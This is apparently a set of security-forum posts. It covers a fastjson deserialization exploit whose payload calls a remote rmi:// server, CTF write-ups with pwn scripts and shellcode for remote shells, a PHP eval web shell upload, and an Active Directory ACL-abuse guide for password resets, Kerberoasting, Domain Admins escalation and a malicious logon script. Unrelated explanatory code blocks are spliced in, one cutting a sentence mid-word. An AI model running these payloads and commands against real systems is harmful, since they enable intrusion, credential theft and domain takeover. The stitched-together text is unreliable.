    JdbcRowSetImpl utilization chain: In fastjson, we use JdbcRowSetImpl for deserialization attacks. The focus of the JdbcRowSetImpl utilization chain is how to call the autoCommit set method. The characteristic of fastjson deserialization is that it automatically calls the set methods of the class, so there is a deserialization problem. As long as the @type type is specified, the corresponding class is automatically called to parse it, so we can construct our utilization chain. When the @type is JdbcRowSetImpl, the JdbcRowSetImpl class is instantiated. So as long as dataSourceName is passed to the lookup method, it can be ensured that the remote attack server is accessed, and then the autoCommit property is used to trigger the lookup. The whole process is as follows: pass the attribute to lookup by setting dataSourceName; set the autoCommit property, and setAutoCommit triggers the connect function; the lookup inside connect uses the dataSourceName parameter just set and reaches the remote server through RMI, thereby executing malicious instructions.
    Exploit is as follows:

        {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.17.39:9999/Exploit","autoCommit":true}

    It is worth noting that:
    1. dataSourceName needs to be placed before autoCommit, because when deserialization sets attributes they are set in order: setDataSourceName first, then setAutoCommit.
    2. The RMI URL is followed by the name of the remote factory class we want to retrieve, because the name under the path is extracted in lookup() as the class to retrieve.
    fastjson version detection:
    1. Use dnslog to get it out. It is best to use your own dnslog, because most dnslogs have been written into blacklists.
    2. Error messages: the payload has not finished reading "{" and "," before entering the defective code block, and the exception thrown carries the version number.
    3. Use scripts to quickly detect version numbers, i.e. call each POC once: if there is a response there is a vulnerability, otherwise there is not.

    CVE-2017-18349: fastjson 1.2.24 RCE
    0x00 Introduction: fastjson is Alibaba's open source JSON parsing library. It can parse strings in JSON format and supports serializing Java Beans into JSON strings or deserializing JSON strings into JavaBeans. That is, the main function of fastjson is to serialize Java Beans into JSON strings, so that after obtaining the string it can be persisted through databases, etc.
    0x01 Vulnerability overview: In the process of parsing JSON, fastjson supports using autoType to instantiate a specific class and call the class's set/get methods to access its attributes. By finding relevant methods in the code, some malicious exploit chains can be constructed.
    0x02 Affected versions: fastjson <= 1.2.24
    0x03 Environment construction:

        cd /vulhub/fastjson/1.2.24-rce
        docker-compose up -d
        docker ps

    Docker opens port 8090; access the target machine IP http://192.168.200.166:8090/
    JDK version switching: The exploit requires JDK 8, and the JDK that comes with Kali is JDK 11, which cannot be used here, so uninstall Kali's JDK 11 first:

        dpkg --list | grep -i jdk      # view installed jdk packages
        apt-get purge openjdk-*        # uninstall openjdk related packages
        dpkg --list | grep -i jdk      # check that all jdk packages have been uninstalled

    Download JDK 1.8: https://github.com/frekele/oracle-java/releases/download/8u212-b10/jdk-8u212-linux-x64.tar.gz
    Put the archive on Kali, decompress it and configure the environment variables:

        mv jdk-8u212-linux-x64.tar.gz /opt/java   # Place in /opt/ja
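The fastjson part of the post explains that the whole chain hinges on an attacker-supplied @type field and a JNDI-style dataSourceName; the corresponding defensive control is to refuse autoType altogether (fastjson's safeMode in 1.2.68 and later) and, in front of older deployments, to inspect request bodies for that shape. The following is an added example, not code from the post or from fastjson: a small inspector that walks a JSON body, reports every explicit @type and every value that is a JNDI-style URL, and rates the body. The request bodies are constructed for the example; the first one mirrors the exploit shape quoted above.

```python
"""Inspect JSON request bodies for fastjson autoType abuse (added example, not from the post)."""
import json
import re

# Constructed sample bodies. SAMPLES[0] has the exploit shape discussed above;
# the rest are benign or not JSON at all.
SAMPLES = [
    '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.17.39:9999/Exploit","autoCommit":true}',
    '{"user":{"name":"alice","roles":["admin"]}}',
    '{"order":{"@type":"com.example.Order","id":7}}',
    '{"note":"see rmi://docs.example.internal/handbook"}',
    'not json at all',
]

# JNDI provider schemes that a deserializer has no business dereferencing.
JNDI_SCHEMES = re.compile(r"^(rmi|ldap|ldaps|iiop|dns)://", re.IGNORECASE)


def walk(node, path="$"):
    """Yield (path, key, value) for every key in nested dicts, descending into lists too."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield path, key, value
            yield from walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk(value, f"{path}[{index}]")


def inspect_body(body):
    """Return a list of reasons the body looks like autoType abuse; [] means clean."""
    reasons = []
    try:
        doc = json.loads(body)
    except ValueError:
        return reasons          # not JSON: a JSON deserializer will not act on it
    for path, key, value in walk(doc):
        if key == "@type":
            reasons.append(f"{path}: explicit @type '{value}' (client must not pick the class)")
        if isinstance(value, str) and JNDI_SCHEMES.match(value):
            reasons.append(f"{path}.{key}: JNDI-style URL '{value}'")
    return reasons


def risk_level(body):
    """'high' when a class is chosen by the client and a JNDI URL is supplied, 'medium' for either, else 'none'."""
    reasons = inspect_body(body)
    has_type = any("@type" in r for r in reasons)
    has_jndi = any("JNDI" in r for r in reasons)
    if has_type and has_jndi:
        return "high"
    return "medium" if reasons else "none"


if __name__ == "__main__":
    for body in SAMPLES:
        print(risk_level(body), inspect_body(body))
```

Flagging every @type, not only the known gadget classes, is deliberate: the gadget list keeps growing, while a legitimate API almost never needs the client to choose the server-side class. The scheme match is anchored to the start of the string, so prose that merely mentions an rmi:// address (SAMPLES[3]) is not reported.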
  23. Guest
    Guest posted a topic in A Test Forum
    1. Data security questions
    1. AS: look at the examples and questions and write the exp.

        def pell_recurrence(x1, y1, x, y, D):
            x_next = x1 * x + D * y1 * y
            y_next = x1 * y + y1 * x
            return x_next, y_next

        # calculate
        def generate_until_threshold(x1, y1, D, threshold):
            x, y = 1, 0
            solutions = [(x, y)]
            iteration = 0
            while True:
                x, y = pell_recurrence(x1, y1, x, y, D)
                iteration += 1
                solutions.append((x, y))
                if x > threshold and y > threshold:
                    break
            return solutions, iteration, (x, y)

        ##################################################################
        def main():
            D = 42232
            x1, y1 = 10863430363390445672094671043496198963286006933268455141841942775234559999, 52862312812076818203801374519259164308207980652808243827880652144787200
            threshold = 2 ** 0x149f
            solutions, iterations, last_solution = generate_until_threshold(x1, y1, D, threshold)
            print(f' x={last_solution[0]}')
            print(f' y={last_solution[1]}')
            n1 = (last_solution[0] - 1) // 2
            n2 = last_solution[1]
            print(n1)
            print(n2)

        if __name__ == '__main__':
            main()

    n1=6484456464385494958985160233577839841735795804647354190796586547182550378527267882223754238651441651725550102689465473718387558249680778387240949510753434184201786605123847893899093406567717389454538 
9482740693358858886945778091075479767043403338315077245817584501204836101045898033382579741708159642221431364092087627932238340345061520303793648076973193990895662534842239113818516252719396503715138316 6115929559837059526120429960898263731511653364200306669261874318917797797511599010768665767007935673823935662067654373217132550990224714558326022862910254573865374743852845589800119354399325882955858912 5426525550586695373047067726351358183887658916360966276066716968285230497455072503555764167568060675739545960438904928347842532194851125250305537530924233133264250758350828806805623873239302114836480000 n2=631077577837315807212150605001212011073700092115983086048740595191397762984508443612849134473582040026490305611506672815790733279455324389749038244192826523764101532018565743490392509759876096077887 8832544423181756899326304063782908439562569708467673549276158693692888001929891891744223454661337998539277783475975019927833495777599483895984131746152326733533402089732453584337320359607883603900037507 8019839415884013345498043473444057860171445618628885820669899955565786433581042661497092955707897522740118225382682538460934652896234403638883250225904674132191120017142678063796240523447446112088083480 9003855463232063187607331663553796062046207210640552948434337370007381441733734803953072245096582393802864729330924382527356098137452931852934251401785618978991521206247075519888904264778862933717556843 876611759454744828205597534256578148852799693013920359743897278354653848976322146722301616470055723006827166136303455670710003638464315811357227470395415655224937948450914818485837106928933473384856351 3562506182502826257198176485230753980573080356791813553201718713496268667916027510756787675230893541319068679146341573352252143049354837542440743305672512279930021618838093554441531642048116980907147626 
423248156091825179885062681506303604070652846991305601280740083579032479034947212812440317249494983943341118835003599780758893627981692531706689912199808384763177614409977387670316498292979992834435354912 2389259490732638723303504957174689978086401613054702247774451584115199235037185582727394255585715896600435834403902988987940547963269504370891849450258752419616559584122132413440460209140828641358681600 NC connection submission Get username:ADMIN-JM password:JM001x! flag: md5(ADMIN-JM+JM001x!) or: #sage 9.5 from Crypto.Util.number import * from pwn import * import sys sys.set_int_max_str_digits(0) def interact(io, x, y): io.recvuntil(b':') io.sendline(b'2') io.recvuntil(b'n1~') io.sendline(str(x).encode()) io.recvuntil(b'n2~') io.sendline(str(y).encode()) io.recvline() return io.recvline() D=42232 check=2 **0x149f def solve_pell(N): cf=continued_fraction(sqrt(N)) i=0 whileTrue: i +=1 denom=cf.denominator(i) numer=cf.numerator(i) if (((numer - 1) //2)=check) or (denom=check): Continue continue if numer^2 - N * denom^2==1: x, y=int((numer - 1) //2), int(denom) res=interact(io, x, y) ifb'Sorry'in res: Continue continue Return res io=remote('47.117.41.252', '33410') context.log_level='debug' res=solve_pell(D) print(res) io.interactive() #b'Verify success!Your username[ADMIN-JM], your password[JM001x!]~'Final flag: b7133d84297c307a92e70d7727f55cbc 2.SCSC Title description: Use program vulnerabilities to obtain data information in info_sec file and submit data in row 11, column 2 Process of the question: When I got the scsc binary file, I found that it was statically compiled, and there was no library function, and the symbol table was missing, resulting in the library function having no name Here we use the reverse technique, there are three ways to restore some symbol tables Use different versions of sig files, try to restore the use of bindiff, use different libc files, compare the machine code of the library function, and use the fingerprint plugin to restore the 
function name (need to be connected to the Internet). I personally think the most effective effect is the fingerprint plugin. This game is also constantly online, so I use it. It not only recognizes libc, but without it, I don’t know that I also used C++ libraries. Here we show the effect after recovery This program is an AES decryption function set shellcode executor and disables some visible characters. We need to encrypt and transmit shellcode without filtering characters. Here is the easiest way to create a read using shellcode, jump, and then enter an ordinary shellcode. The visible character filtering here limits "sh" and various 64-bit register operations. So I used 32 bit registers, easily bypassed, turned on sys_read, inject shellcode, getshell from pwn import * from std_pwn import * from Crypto.Cipher import AES from Crypto.Util.Padding import pad defgetProcess(ip,port,name): Global P iflen(sys.argv) 1and sys.argv[1]=='r': p=remote(ip, port) Return p else: p=process(name) Return p sl=lambda x: p.sendline(x) sd=lambda x: p.send(x) sa=lambda x, y: p.sendafter(x, y) sla=lambda x, y: p.sendlineafter(x, y) rc=lambda x: p.recv(x) rl=lambda: p.recvline() ru=lambda x: p.recvuntil(x) ita=lambda: p.interactive() slc=lambda: asm(shellcraft.sh()) uu64=lambda x: u64(x.ljust(8, b'\0')) uu32=lambda x: u32(x.ljust(4, b'\0')) # return sl, sd, sa, sla, rc, rl, ru, ita, slc, uu64, uu32 defaes_ecb_encrypt(plaintext): print(plaintext) for c inb'0MOyhjlcit1ZkbNRnCHaG': if c in plaintext: print(f'{chr(c)} in it !') # Convert hexadecimal string key to bytes key=b'862410c4f93b77b4' # Create an AES encryptor cipher=AES.new(key, AES.MODE_ECB) # Fill in and encrypt the plain text padded_plaintext=pad(plaintext, AES.block_size) ciphertext=cipher.encrypt(padded_plaintext) # Convert ciphertext to hexadecimal string and return return ciphertext shellcode=''' push rsp pop rsi mov edi,0 mov edx,0xff push rdi pop rax syscall jmp rsp ''' # 01ayhcjitkbn MOlZNRCHG 
p=getProcess('47.117.42.74',32846,'./scsc') context(os='linux', arch='amd64', log_level='debug',terminal=['tmux','splitw','-h']) elf=ELF('./scsc') gdba() payload=asm(shellcode) sa('magic data:',aes_ecb_encrypt(asm(shellcode))) sl(asm(shellcraft.sh())) ita() or #!/usr/bin/env python3 from pwn import * context.log_level='debug' context.arch='amd64' # io=process('./scsc') io=remote('47.117.41.252',33414) shellcode=''' xchg r8, rax xchg r8, rsi sub edi, edi mov edx,0x99 sub eax, eax syscall ''' payload1=asm(shellcode) print('shellcode=', payload1.hex()) payload1=bytes.fromhex('e29aca48e52d1d59c539c172262e56c7aeae3b0ebb4e872fa01f84506ad7c226') payload2=b'\x90'*len(payload1) + asm(shellcraft.sh()) # gdb.attach(io) io.sendlineafter(b'magic data:', payload1) pause() io.send(payload2) io.interactive() 3.ez_upload Title description: There is no attachment to the test question in this question, please ignore the attachment download button! A server stores the RSA key file for encrypted data. The administrator did not repair the vulnerable test site in time when maintaining the server site. Please submit the path where the RSA key is located (submission style: If the path where the file is located is /var/www, the submission answer is /var/www) Problem procedure: Preliminary idea, pass on horse, getshell, and then find files related to RSA html and php are all dropped by waf. The suffix may be used to detect the file content. Content-Type: text/html Waf this The suffix was wafed, html, php,htaccess,'.php','.php5','.php4','.php3','.php2','.html','.htm','.pht','.pht','.pHp','.pHp5','.pHp4','.pHp3','.pHp2','.Html','.Htm','.pHtml,user.ini Echoing as NOT THIS. But the echo of the phtml suffix is NOT THIS CONTEHT php7.2 or above, htaccess file needs to be configured It's not png 2 rendering The middleware is apache, resolve vulnerability? It is found that the file content is checked, and the content containing php will be dropped by waf. 
Successfully passed on horse ?=@eval($_POST['cmd']); The path to find the RSA key is /var/www/rssss4a 4.Data disclosure and privacy protection Title description: As a technical support staff member of a publicity department, when conducting an activity to publicly commend outstanding volunteers, due to excessive data desensitization, the personal information cannot be accurately identified, resulting in Multiple volunteers are confused about information. Please solve the problem according to the task requirements of 《题目说明文档》 in the attachment. Problem procedure: Entry :open file - table base64 encryption - use time() to generate pseudo-random array - Exoor encryption - write to new file
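The post solves the AS task in two ways: a recurrence over a known fundamental solution, and a sage continued_fraction() walk. The following is an added example (not code from the post) that does both in pure Python: it finds the fundamental solution of x^2 - D*y^2 = 1 from the continued fraction of sqrt(D), then raises it to powers with the post's recurrence until both coordinates exceed the challenge threshold, checking the Pell equation at every step. D = 42232 and the threshold 2**0x149f are the challenge values; the n1 = (x - 1) // 2, n2 = y answer format is taken from the post's scripts.

```python
from math import isqrt


def fundamental_pell_solution(D):
    """Smallest positive (x, y) with x*x - D*y*y == 1, found by walking the
    convergents h/k of the continued fraction of sqrt(D) until one satisfies
    the equation (this is what the post's sage continued_fraction() loop does)."""
    a0 = isqrt(D)
    if a0 * a0 == D:
        raise ValueError("D must not be a perfect square")
    m, d, a = 0, 1, a0            # continued-fraction state for sqrt(D)
    h_prev, h = 1, a0             # numerators   h_{n-1}, h_n  (h_0 = a0)
    k_prev, k = 0, 1              # denominators k_{n-1}, k_n  (k_0 = 1)
    while h * h - D * k * k != 1:
        m = d * a - m
        d = (D - m * m) // d
        a = (a0 + m) // d
        h_prev, h = h, a * h + h_prev
        k_prev, k = k, a * k + k_prev
    return h, k


def next_solution(x1, y1, x, y, D):
    """(x + y*sqrt(D)) * (x1 + y1*sqrt(D)): the recurrence used in the post."""
    return x1 * x + D * y1 * y, x1 * y + y1 * x


def solution_above(D, threshold):
    """Raise the fundamental solution to successive powers until both x and y
    exceed threshold; every intermediate pair is re-checked against the equation."""
    x1, y1 = fundamental_pell_solution(D)
    x, y = x1, y1
    while not (x > threshold and y > threshold):
        x, y = next_solution(x1, y1, x, y, D)
        assert x * x - D * y * y == 1
    return x, y


def challenge_answer(D, threshold):
    """The two numbers the service asks for: n1 = (x - 1) // 2 and n2 = y."""
    x, y = solution_above(D, threshold)
    return (x - 1) // 2, y


if __name__ == "__main__":
    D, threshold = 42232, 2 ** 0x149f        # values from the challenge
    x1, y1 = fundamental_pell_solution(D)
    print(f"fundamental solution: x1 has {len(str(x1))} digits, y1 has {len(str(y1))} digits")
    n1, n2 = challenge_answer(D, threshold)
    print(f"n1 has {len(str(n1))} digits, n2 has {len(str(n2))} digits")
```

For a D with an odd continued-fraction period the first convergent at the end of the period gives x^2 - D*y^2 = -1, which is why the loop tests for exactly 1 rather than stopping at the end of the period.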
  24. Guest
    Guest posted a topic in A Test Forum
    Abuse of Active Directory ACL/ACE permissions
    https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse
    https://www.cnblogs.com/nice0e3/p/15879624.html

    DACL and ACE are access-control concepts commonly used in operating systems and network environments. A detailed explanation:

    DACL (Discretionary Access Control List): a DACL is an access control list used to determine who can access a specific object (a file, folder, registry key, etc.). A DACL is a list of access control entries (ACEs).

    ACE (Access Control Entry): an ACE is the basic unit of a DACL and is used to grant or deny access to an object. Each ACE defines a security principal (a user, group, computer, etc.) and the permissions that principal has.

    In a DACL, each ACE contains the following information:
    Security principal (SID): a unique identifier for the user, group or computer whose access is granted or denied.
    Access permissions: the specific operations or permissions (read, write, execute, etc.).
    Access mask: specifies the permissions that are actually granted or denied.
    Auxiliary access mask: in some cases, used to specify other conditions or restrictions.

    When an object is accessed, the system checks the ACEs in the DACL. Access is allowed if there is an ACE that matches the user identity and grants the requested permission. If there is no matching ACE, or an ACE matches the user identity but denies the requested permission, access is denied.

    The ACEs of the domain administrator are as follows. Among them, the permissions we care about are:

    GenericAll - full rights to the object (add users to a group or reset a user's password)
    GenericWrite - update the object's attributes (e.g. logon script)
    WriteOwner - change the object owner to an attacker-controlled user and take over the object
    WriteDACL - modify the object's ACEs and give the attacker full control over the object
    AllExtendedRights - ability to add a user to a group or reset a password
    ForceChangePassword - ability to change a user's password
    Self (Self-Membership) - ability to add yourself to a group

    Self-Membership - this permission means that an account can add itself to a group (the ACE has to be added in the advanced permissions of a certain group, i.e. it is set on group objects); that is, an object has the Self-Membership identity in a certain group.

    GenericAll

    GenericAll permissions on user accounts

    Use the PowerView tool to view the user's GenericAll permissions.

    powershell -exec bypass
    Import-Module .\PowerView.ps1
    // Get the access control list (ACL) of the AD object of user man1 and return only the entries with 'GenericAll' rights
    Get-ObjectAcl -SamAccountName man1 -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq 'GenericAll'}

    You can see that the spotless user has GenericAll permissions over delegate, so once the spotless user has been obtained, we can take over the delegate user.

    Change password: change the delegate user's password directly.
    net user username password /domain

    Kerberoasting attack: set an SPN on the delegate user, then request STs for all services with the spotless user's TGT, obtain the ST encrypted with the delegate user's hash, and crack it.
    # Set SPN
    Set-DomainObject -Credential $creds -Identity username -Set @{serviceprincipalname='fake/NOTHING'}
    # Get hash
    .\Rubeus.exe kerberoast /user:username /nowrap
    # Clean SPN
    Set-DomainObject -Credential $creds -Identity username -Clear serviceprincipalname -Verbose
    https://github.com/ShutdownRepo/targetedKerberoast
    python3 targetedKerberoast.py -v -d domain.local -u username -p password

    ASREPRoast attack: you can make a user ASREPRoastable by disabling pre-authentication and then perform an ASREPRoast attack on it.
    Set-DomainObject -Identity username -XOR @{UserAccountControl=4194304}

    GenericAll permissions on user groups

    // Get the distinguishedName of the Domain Admins group
    Get-NetGroup 'domain admins'
    // Get the ACL of the Domain Admins group
    Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq 'CN=Domain Admins,CN=Users,DC=vvvv1,DC=com'}

    It was found that the spotless user has GenericAll permissions on the Domain Admins group and can attack. Add yourself (user spotless) or other users to the Domain Admins group.
    net group 'domain admins' spotless /add /domain

    You can also use the Active Directory or PowerSploit modules for the attack.
    # with active directory module
    Add-ADGroupMember -Identity 'domain admins' -Members spotless
    # with Powersploit
    Add-NetGroupUser -UserName spotless -GroupName 'domain admins' -Domain 'offense.local'

    GenericAll permissions on machine or service accounts

    If you have GenericAll or GenericWrite permissions on a machine account or service account, consider a resource-based constrained delegation attack; for details see 《内网横向移动-基于资源的约束委派》 (Intranet lateral movement - resource-based constrained delegation). For service accounts you can also consider the user-account attacks above, or use Shadow Credentials.
    shadow credentials
    https://book.hacktricks.xyz/window-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials
    https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab
    http://www.hackdig.com/02/hack-599160.htm
    https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html

    WriteProperty

    WriteProperty permissions on user groups

    Our controlled user has WriteProperty permission on the Domain Admins group. This user can be added to the Domain Admins group to escalate privileges.
    powershell -exec bypass
    Import-Module .\PowerView.ps1
    Add-NetGroupUser -UserName user -GroupName 'domain admins' -Domain 'vvvv1.com'

    Self (Self-Membership)

    Self (Self-Membership) permissions on user groups

    Our controlled user has Self (Self-Membership) permission on the Domain Admins group. This permission can also add the user to the group; add the user to the Domain Admins group to escalate privileges.
    powershell -exec bypass
    Import-Module .\PowerView.ps1
    Add-NetGroupUser -UserName user -GroupName 'domain admins' -Domain 'vvvv1.com'

    'WriteProperty (Self-Membership)' and 'Self (Self-Membership)' are both attributes related to self-membership, but they differ in meaning.
    'WriteProperty (Self-Membership)': this property indicates that the object can write (modify) its own properties. Generally speaking, an object can only modify the properties of other objects and cannot directly modify its own properties, but when the 'WriteProperty (Self-Membership)' property is set, the object can modify its own properties.
    'Self (Self-Membership)': this property indicates that the object itself is a member of the group or collection it is in. It is different from the 'WriteProperty (Self-Membership)' property: 'Self (Self-Membership)' indicates that the object itself is a member of its group or collection, while 'WriteProperty (Self-Membership)' indicates that the object has permission to modify its own properties.
    Summary: if the object type is not All but Self-Membership, it means that the user object we are querying belongs to this group. The 'WriteProperty (Self-Membership)' attribute gives the object permission to modify its own attributes, so that the object can be added to the group; the 'Self (Self-Membership)' attribute indicates that the object itself is a member of the group or collection it is in, and the object can also be added to the group.

    WriteProperty (Self-Membership)

    WriteProperty (Self-Membership) permissions on user groups

    Our controlled user has WriteProperty (Self-Membership) permission on the Domain Admins group.
    Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq 'CN=Domain Admins,CN=Users,DC=offense,DC=local' -and $_.IdentityReference -eq 'OFFENSE\spotless'}

    This permission can also add the user to the group; add the user to the Domain Admins group to escalate privileges.
    net group 'domain admins' spotless /add /domain

    ForceChangePassword

    ForceChangePassword permissions on user accounts

    If our controlled account appears in the target account's ACL with the 'User-Force-Change-Password' object type and the 'ExtendedRight' permission, we can reset the user's password without knowing the user's current password.
    powershell -exec bypass
    Import-Module .\PowerView.ps1
    Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq 'OFFENSE\spotless'}

    Use PowerView to change the password.
    Set-DomainUserPassword -Identity delegate -Verbose

    Or use:
    $c = Get-Credential
    Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose

    Or as a single line:
    Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

    WriteOwner

    WriteOwner permissions on user groups

    Before the attack, the owner of Domain Admins was Domain Admins. After enumerating the ACEs of a group, if we find that a user under our control, spotless, has the 'WriteOwner' permission and that permission applies to 'ObjectType: All', then the owner of the group can be modified.
    Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq 'CN=Domain Admins,CN=Users,DC=offense,DC=local' -and $_.IdentityReference -eq 'OFFENSE\spotless'}

    We can change the owner of the 'Domain Admins' object to our user, in our case 'spotless'. Note that the SID given to '-Identity' is the SID of the 'Domain Admins' group.
    Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity 'spotless' -Verbose
    // You can also use the name instead of the SID (HTB: Reel)
    Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'spotless'

    GenericWrite

    GenericWrite is also identified in the access mask. This permission can update the property values of the target object. You can use Set-DomainObject in PowerView to set the value of the target property.

    GenericWrite permissions on user accounts

    Get-ObjectAcl -ResolveGUIDs -SamAccountName delegate | ? {$_.IdentityReference -eq 'OFFENSE\spotless'}

    The controlled user spotless has the 'WriteProperty' permission on another user, delegate, and this permission applies to the 'Script-Path' object type. It allows attackers to overwrite the delegate user's logon script path, which means that the next time the delegate user logs in, their system will execute our malicious script.
    Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue '\\10.0.0.5\totallyLegitScript.ps1'

    You can see that the logon script field of the delegate user is updated in AD.

    GenericWrite permissions on user groups

    Allows you to add new users (such as yourself) as members of the group. Similar to the 《GenericAll-对用户组的GenericAll权限》 (GenericAll permissions on user groups) operation above.
    https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse
    # Create creds
    $pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
    $creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
    # Add user to group
    Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'username' -Verbose
    # Check user was
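The post reads PowerView output that has already resolved the raw ACE into names (GenericAll, WriteProperty, an ObjectType such as 'Script-Path' or 'All'). The following is an added example (not from the post or from PowerView) that performs that resolution in Python on the two raw values an ACE actually carries, the access mask and the ObjectType GUID, and maps them to the takeover primitives listed above. The bit values are the ADS_RIGHT_* constants of the AD access mask and the composite GenericAll/GenericWrite values the .NET ActiveDirectoryRights enum prints; the GUIDs are the rightsGuid of User-Force-Change-Password and the schemaIDGUID of the member and scriptPath attributes, which is what -ResolveGUIDs looks up. The `abuse_paths` function and its wording are this example's own.

```python
# ADS_RIGHT_* bits of an AD ACE access mask and the composite values that the
# .NET ActiveDirectoryRights enum (and therefore PowerView) displays for them.
RIGHTS = {
    "CreateChild":   0x00000001,
    "DeleteChild":   0x00000002,
    "ListChildren":  0x00000004,
    "Self":          0x00000008,   # validated write, e.g. Self-Membership
    "ReadProperty":  0x00000010,
    "WriteProperty": 0x00000020,
    "DeleteTree":    0x00000040,
    "ListObject":    0x00000080,
    "ExtendedRight": 0x00000100,   # control access right, e.g. User-Force-Change-Password
    "Delete":        0x00010000,
    "ReadControl":   0x00020000,
    "WriteDacl":     0x00040000,
    "WriteOwner":    0x00080000,
}
GENERIC_ALL = 0x000F01FF    # printed as "GenericAll"
GENERIC_WRITE = 0x00020028  # ReadControl | Self | WriteProperty, printed as "GenericWrite"

# ObjectType GUIDs. An all-zero GUID means the right applies to the whole object
# (PowerView shows this as ObjectType "All").
NULL_GUID = "00000000-0000-0000-0000-000000000000"
FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"  # User-Force-Change-Password
SELF_MEMBERSHIP = "bf9679c0-0de6-11d0-a285-00aa003049e2"        # member attribute (Self-Membership)
SCRIPT_PATH = "bf9679a8-0de6-11d0-a285-00aa003049e2"            # scriptPath attribute (Script-Path)


def decode_rights(mask):
    """Names for the bits set in an access mask, collapsing the composites first."""
    if mask & GENERIC_ALL == GENERIC_ALL:
        return ["GenericAll"]
    names = [name for name, bit in RIGHTS.items() if mask & bit]
    if mask & GENERIC_WRITE == GENERIC_WRITE:
        names.insert(0, "GenericWrite")
    return names


def abuse_paths(mask, object_type=NULL_GUID, ace_type="Allow"):
    """Map one ACE (mask + ObjectType GUID) to the primitives listed in the post.
    A Deny ACE grants nothing, so it yields no path."""
    if ace_type != "Allow":
        return []
    object_type = (object_type or NULL_GUID).lower()
    if "GenericAll" in decode_rights(mask):
        return ["GenericAll: full control (reset password, add group member, RBCD, shadow credentials)"]
    paths = []
    if mask & RIGHTS["WriteDacl"]:
        paths.append("WriteDACL: add a GenericAll ACE for yourself")
    if mask & RIGHTS["WriteOwner"]:
        paths.append("WriteOwner: take ownership, then rewrite the DACL")
    if mask & RIGHTS["ExtendedRight"]:
        if object_type == NULL_GUID:
            paths.append("AllExtendedRights: reset password or add group member")
        elif object_type == FORCE_CHANGE_PASSWORD:
            paths.append("ForceChangePassword: Set-DomainUserPassword without the old password")
    if mask & RIGHTS["Self"] and object_type in (NULL_GUID, SELF_MEMBERSHIP):
        paths.append("Self-Membership: add yourself to the group")
    if mask & RIGHTS["WriteProperty"]:
        if object_type == NULL_GUID:
            paths.append("GenericWrite/WriteProperty(All): set SPN, scriptPath, msDS-KeyCredentialLink, members")
        elif object_type == SELF_MEMBERSHIP:
            paths.append("WriteProperty(Self-Membership): add members to the group")
        elif object_type == SCRIPT_PATH:
            paths.append("WriteProperty(Script-Path): plant a logon script")
    return paths


if __name__ == "__main__":
    # constructed ACEs for the cases discussed in the post
    for mask, guid in [(GENERIC_ALL, NULL_GUID), (0x100, FORCE_CHANGE_PASSWORD),
                       (0x20, SCRIPT_PATH), (0x8, SELF_MEMBERSHIP), (0x80000, NULL_GUID)]:
        print(f"{mask:#010x} {guid}: {decode_rights(mask)} -> {abuse_paths(mask, guid)}")
```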
  25. Guest
    Guest posted a topic in A Test Forum
    Domain logs generally end in .evtx, so to search for logs in the domain we use the dir command:
    dir /s /b *.evtx
    /s: recursive search, including subdirectories. /b: bare format, only the file path is shown, with no other information.

    Here we can directly use the LogParser tool to export log information in the domain (on the domain controller). LogParser filters with SQL queries. Use the following command to filter out the logon behaviour of domain users through the Strings column and the EventID column:
    LogParser.exe -i:evt -o:csv "SELECT RecordNumber,TimeWritten,EventID,Strings,Message INTO C:\log5.csv FROM Security WHERE EventID = 4624 AND Strings LIKE '%|Kerberos|%|%.%.%.%|%' AND Strings NOT LIKE '%|%$|%'"
    -i: input file type
    -o: output file type

    In a normal domain penetration we take the domain controller directly and operate on it to export the logs. Generally it is unrealistic to export the domain controller's logs or the logs of a specified member host for analysis; the options are: 1. VPN; 2. build a socks tunnel; 3. use a remote trojan.

    Query logs through VPN

    Generally speaking, connect to the target host through VPN and enter the intranet environment to operate. Here we assume the domain admin account has been obtained and export the logs for analysis with the domain admin credentials.

    1. Query the host's logon records

    First obtain the log storage location on the domain controller:
    dir /s/b \\10.10.10.10\c$\security.evtx
    The domain controller's log file can be copied locally with the copy command:
    copy \\10.10.10.10\c$\Windows\System32\winevt\Logs\ C:\Users\admins\Desktop\log
    Since the log file is a hidden file, we cannot export all .evtx files directly through LogParser (they cannot be searched). However, LogParser can remotely export part of the logs:
    LogParser.exe -i:EVT -o:CSV "SELECT * INTO C:\1.csv FROM \\RemoteServer\Security"
    LogParser.exe -i:EVT -o:CSV "SELECT * INTO C:\1.csv FROM \\10.10.10.10\Security"

    2. Query the log traces left by connections

    When we look for log traces, we must first understand the authentication methods used for these logons: Windows uses NTLM authentication by default, while Kerberos authentication is used in the domain network. Simply put, NTLM is direct host-to-host authentication, and Kerberos is authenticated by a third party (the domain controller). The domain controller only issues credentials to hosts and domain accounts within the domain. Therefore, when an IP is used to address a remote host, NTLM authentication is used; when a domain name or machine name is used, Kerberos authentication is used.

